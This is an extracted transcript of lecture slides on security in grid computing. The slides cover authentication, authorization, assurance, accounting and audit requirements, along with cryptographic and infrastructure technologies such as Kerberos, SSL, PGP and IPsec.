Transcript Chapter16

Security in Grid Computing
1
GRID COMPUTING


Three basic approaches for managing
code, data and computer resource:
1. Remote Computing: (as provided by
CORBA)


The code of interest is at a computer-server.
The user sends his data for processing to the
computer server and gets back the results.
Ref: Ch.16 : “Security, Accounting and Assurance” by Clifford Neuman
2
Three basic approaches:

(continued)
2. Code Shipping: (as used in ‘network
computers’)
The requesting location gets the
code, which is normally located on a
server.
 The code operates on the local data
at the clients environment.

3
The Third approach:

3. Proxy Computing: (as used in Legion
and Globus)


Both the code and the hardware may be
obtained from other parties.
Both the code and data are transferred to
the compute-server and the results are
made available to the user.
4
Requirements

Requirements:

Validation of




source and code-integrity,
the client,
the computer server, and,
The code provider.
5
Grid Security
Traditional Security System :
To protect the system, owned by one user, against attempts at
unauthorized “entry” from all the other unauthorized users
(supposed to be of malicious intent).
GRID Security Systems :




To protect application and data from the owner/administrator
of the system and
to protect local programs and data on the system on which
another remote user’s process may also be getting executed
Data, Code and resources accepted after proper authentication
Integrity of data and code is required to be verified.
6
Security Requirements
1. AUTHENTICATION
Verifying a principal’s claimed identity.
Principal:- a user logged on a remote system or
- a local user logged on the server or
- the server itself
Two - step process: - User Name
- Password
(check: - something you know (common)
- Something you have
- Something you are
- what you do (key-stroke patterns)
- where you are )
7
Security Requirements (cont’d)
GRID: Mutual authentication required for user and service
provider.
(The resources and data being provided by a server could be
provided by an attacker.)
Data origin authentication : To determine whether a program
was modified or sent by an attacker to compromise the server.
Data origin authentication : does not inform the data was recently
sent by the principal.
Delegation of Identity : When an application or a process is
authorized to assume the identity of a different principal.
8
Security Requirements :
Authorization
2. AUTHORIZATION :
Authentication is used for granting authorization.
Authorization is based on

the successful authentication of a principal and

the information available with the server. The information is the
Access Control List for a file/directory/service.
Example : - Authorization for accessing a file in a digital library.
- Authorization for reserving bandwidth on a network by
using RSVP(Resource Reservation Protocol).
- Authorization to run a task on a given node.
Access Control Lists may also contain
- Names of authorized programs
- Checksums of authorized programs
- Names of principals authorized to invoke the program.
9
Security Requirements :
Authorization (cont’d)
Delegation of Authority : by a user or a process authorized to
perform an operation to another process.
Delegation of Authority vs Delegation of Identity : DA is more
restrictive than DI.
Important for running tasks on remote nodes since the tasks
may have to be given the authority to read/write data on
entities across the network.
Example : A Resource Manager may allocate a node to a task. It
delegates to the task’s initiator the authority to use the node.
10
Security Requirements :
Assurance
3. ASSURANCE/Accreditation :
Authorization
So that the service provider may decide whether to perform the
job of the requester of the service.
Assurance
So that the requester of the service may decide whether the
service provider/node satisfies his needs for security, reliability
etc.
Example : If the service provided is a software package : A
Resource Manager has to verify assurance credentials of the
program before it is run.
11
Security Requirements :
Accounting
4. ACCOUNTING :
Grid requires distributed accounting servers and the systems
should be scalable beyond organizational boundaries.
Scenario of Excess Processing Power : equitable distribution of
load/earnings.
Scenario of Excess Processing Loads : equitable decision about
which jobs to run.
cost ?
in cash/barter ?
12
Security Requirements :
Audit and Integrity & Confidentiality
.
5 AUDIT :
Audit function records

the operations performed by each system on the grid ;

the principal for whom the operation was performed etc.
This is to analyze failures, security breaches, intrusions.
To detect Network attacks, audit function should be distributed.
Or audit records sent to a central location for each
organization.
And
summary information shared
across network boundaries.
.
6 Integrity and confidentiality of program and data sent from one
node to another.
13
Security Requirements : Comments
Authentication
Authorization
Integrity
Are Mandatory
Others may be needed for some applications/ environments.
Basically Authentication establishes who you are.
Authorization establishes what you can do.
In Grid applications, the User is also to be protected from
Interference by others. The needs of the user would depend
upon his application.
14
Technologies :
Cryptography
symmetric
asymmetric – public/private key system
Comparison : Asymmetric systems require the generation of only
one key-pair for every user,
Symmetric system requires the generation of a key for
every pair of users.
Thus the number of keys required for a symmetric key system is
n(n-1)/2, where is it is 2n for asymmetric case. (for n >= 6,
the number of keys for symmetric system is more than that
for an asymmetric system.)
15
Cryptographic Systems: Performance
Performance : Asymmetric systems are much slower than the
corresponding symmetric systems.
Example (page 402, 1999 book) : RSA, with a common key size of
512 to 1024 bits, may take 100 ms or longer on PC’s.
Problem of Certifying Authority/Trusted Third Party.
16
Technologies:
(Cont’d)
Application:
Authentication Systems :
-ASSERTION-based :
for systems where processors and their
associated software is trusted
to identify users to other
process.
and where messages are protected from
modification by adversaries.
-Password-based :
PW cannot be sent on a network.
Use PW as an encryption key
17
Encryption: Applications
Encryption used for
- confidentiality of data
- integrity of data (message digest/check sum)
- authentication
Certification for Authentication :
provides the binding between
- an Encryption key and
- the authenticated identity
X.509 used by – browsers
- commercial e-mail
- PK products based electronic payment systems.
18
Distributed Authorization & Assurance
Hierarchical organization of CA’s
Certification is also required for
authenticity of authorization
(PRIVILEGE ATTRIBUTE CERT)
authenticity of assurance
(CREDENTIALS CERT)
To an authorization for an operation may be added restrictions and
conditionalities.
ALTERNATIVE : Authorization information may be provided by an
authorization Server directly to the Service Provider.
Integrity of communication between the Authorization Server and
the Service Provider?
19
Accounting
BILLING – requires authentication of user.
- requires to know the constraints on authorization for
levying charges correctly.
Limits :
- Limits on Resource Use by a User
- Limits on use of the Resource – set by a Service Provider.
may require co-ordination/some element of centralization even
when accounting is distributed.
Intrusion Detection & Audit Systems
20
CURRENT PRACTICES
USE IN GRID SECURITY
21
Current Practices

File & e-mail encryption Technologies



Transport Layer technologies/ Web Access
Technologies


Pretty Good Privacy
S/MIME
Secure Socket Layer
Network Encryption Technologies

IP sec used for implementing VPNs
can use
 Kerberos,
 public key system or
 symmetric keys- known to the two hosts
22
Current Security Practices… continued

Authentication Technologies



Kerberos
PK certificates
Assurance technologies


Microsoft Authenticode
Proposals :



Mechanism for issuing Credentials
Platform for Content Selection (PICS)
Confinement Technologies
23
Distributed Authorization Mechanism

Authorization: group information or
authorization to perform certain operations
OSF-DCE
(Open Software Foundation’s Distributed Computing Environment)

Comprehensive frameworks for Authorization
have become available;
required to be designed, implemented and
tested before rolling out on the grid
24
Distributed Authorization Mechanism
…. contd

Authorization information can be sent to
the Service Provider –
- directly through
restricted Credentials, or
- through adding
authorization information to certificates
25
Security at Transport layer

At transport layer, addition of security
mechanism can provide
Authentication
 Confidentiality
 Integrity
Security can be adapted to the requirements of
communication.
Example: for a multi-processor system
communication, no encryption may be required.
Authorization can be decided only after interrogating
the application.

26
Distributed Authorization Mechanism
…continued

Performance Issues:
Authentication may be required only
once.
Authorization and delegation of
authorization may be required many
times during the execution of a job.
PK based systems, like the certificates,
may become a bottleneck.
27
Current Security Practices… continued


IPSec and VPNs
Firewalls:
Open channel grid connected to others
through a public network through
encrypted message flow
28
Grid Practices
1. Grids use technologies similar to the ones
used in PGP.

Procedure





Compute a Message Digest function over the message
Encrypt the message – Symmetric key
Encrypt the message Digest and Symmetric key by
using the public key-system
Confidentiality – Use recipient’s public key.
Integrity (Digital Signature) – Use Sender’s private key
In PGP, any user can certify another user’s
certificate. The verifier decides whether he would
accept the certificate or not.
Grid: a more formal process
29
Grid Practices …
continued
2. SSL is normally used in web browsers to
authenticate the server.
User: authenticated by password(over a
secure channel)

In grid applications, the user certificate can
be used to authenticate user.

To improve performance SSL may be
permitted to cache symmetric keys
The cached keys: To be used for subsequent
connections between the server and the
user for connections between the same
entities.
30
Grid Practices …
continued
3. Kerberos: Suitable for systems which require
frequent authentication
 Better performance than that of systems
based on public-key cryptography
 Can be integrated easily with ‘Intrusion
Detection and Authorization systems.
(due to its centralized nature)
PKINIT extension to Kerberos
31
Grid Practices …

Disadvantage: A trusted on-line key
Distribution Center (KDC)


continued
Each pair of communicating entities have to go
to KDC
4.Others:
Netcheque for distributed accounting
32